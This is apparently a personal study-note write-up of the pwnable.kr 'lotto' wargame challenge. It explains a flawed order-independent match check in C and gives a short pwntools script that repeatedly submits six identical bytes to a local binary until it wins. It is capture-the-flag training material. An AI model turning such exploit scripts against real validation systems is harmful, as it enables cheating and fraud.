Pwnable.kr Lotto

Last updated Aug 20, 2022 Edit Source

Cs security

Here, we have lotto program, however, while checking if our input is a match, it uses the following piece of code:

1
2
3
4
5
6
7
8
int match = 0, j = 0;
for(i=0; i<6; i++){
    for(j=0; j<6; j++){
        if(lotto[i] == submit[j]){
            match++;
        }
    }
}

Basically, it intends to check whether the numbers are a match regardless of the order. But here, if we provide an array of all ones, then if there is a one in the random array, then we get a pass.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
from pwn import *

p = process("./lotto")
while True:
    p.recvuntil("-")
    p.clean()
    p.sendline("1")
    p.recvuntil("bytes :")
    p.sendline("\x01\x01\x01\x01\x01\x01")
    p.recvuntil("Start!\n")
    s = p.recvline()

    if s != b'bad luck...\n':
        print(s)
        break

p.close()

Neocortex 🧠

Pwnable.kr Lotto

Backlinks

Interactive Graph